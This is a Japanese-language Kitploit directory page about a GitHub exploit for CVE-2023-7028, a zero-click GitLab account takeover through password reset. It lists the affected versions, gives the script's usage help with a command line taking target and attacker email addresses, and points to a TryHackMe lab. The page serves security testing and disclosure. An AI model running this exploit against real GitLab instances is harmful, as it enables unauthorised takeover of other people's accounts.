Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2023-7028 — CVE-2023-7028 のエクスプロイト - GitLab CE/EE | Kitploit
ツール/GitHubGitHub/yoryio/cve-2023-7028
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト認証ラボと実践
GitHubyoryio/cve-2023-7028

CVE-2023-7028

CVE-2023-7028 のエクスプロイト - GitLab CE/EE

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2023-7028

⚠️ このエクスプロイトは防御目的であり、潜在的に脆弱なGitLabサーバーを特定するためにサイバーセキュリティ専門家が使用すべきものです。

説明

CVE-2023-7028 - パスワードリセットによるアカウント奪取(ユーザーの操作不要)GitLab Community Edition および Enterprise Edition

gitlablogo

影響を受ける製品とバージョン:

製品影響を受けるバージョン
GitLab Community Edition および Enterprise Edition< 16.1.6
< 16.2.9
< 16.3.7
< 16.4.5
< 16.5.6
< 16.6.4
< 16.7.2
  • CVSS: 10.0
  • 積極的に悪用されている: YES
  • パッチ: YES
  • 緩和策: NO

ヘルプ

root@kitploit:~
usage: CVE-2023-7028.py [-h] -u URL -t TARGET -a ATTACKER

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     GitLab URL (HTTP or HTTPS)
  -t TARGET, --target TARGET
                        Target email address
  -a ATTACKER, --attacker ATTACKER
                        Attacker email address

例: python CVE-2023-7028.py -u https://gitlab.example.com -t [email protected] -a [email protected]

ラボ

Try Hack MeのRoom GitLab CVE-2023-7028 を使用してエクスプロイトをテストできます。このRoomはCVE-2023-7028の影響を受ける脆弱なバージョンを実行しているためです。

SHADOWSERVERによるGitLabサーバーの可視化:

map2

参考情報

  • GitLab Critical Security Release: 16.7.2, 16.6.4, 16.5.6
  • 5,300以上のGitLabサーバーがゼロクリックアカウント奪取攻撃にさらされる
  • Shadowserver GitLab統計
  • CVE-2023-7028 - AttackerKB
ツールをダウンロード